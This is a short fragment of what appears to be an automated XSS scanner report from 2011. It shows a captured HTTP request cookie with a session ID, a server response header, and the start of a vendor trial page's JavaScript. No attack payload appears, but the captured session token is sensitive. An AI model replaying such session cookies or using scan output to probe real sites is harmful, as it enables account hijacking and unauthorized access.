Cookie: tnt=2; PHPSESSID=61h0gue0dk2uih0hdl5dfnm235; __utmz=1.1300715138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.808082665.1300715138.1300715138.1300715138.1; __utmc=1; __utmb=1.7.10.1300715138; s_pers=%20s_vnum%3D1332251137601%2526vn%253D1%7C1332251137601%3B%20s_visit%3D1%7C1300716972086%3B%20gpv_pageName%3Dus/company%7C1300716972094%3B%20s_nr%3D1300715172098-New%7C1332251172098%3B%20s_invisit%3Dtrue%7C1300716972103%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=check#true#1300715233|session#1300715160014-248282#1300717033|PC#1300715160014-248282.17#1301924773

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Mar 2011 13:46:15 GMT
X-Varnish: 451499179
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 5260

var ESET_Trial = {

init: function() {
if($('trial_form')) {
$('trial_form').addEvent('submit', function(e) {
if(!this.validate()) {
e.stop();
}
}.bind(this
...[SNIP]...

Report generated by XSS.CX at Mon Mar 21 08:57:54 CDT 2011.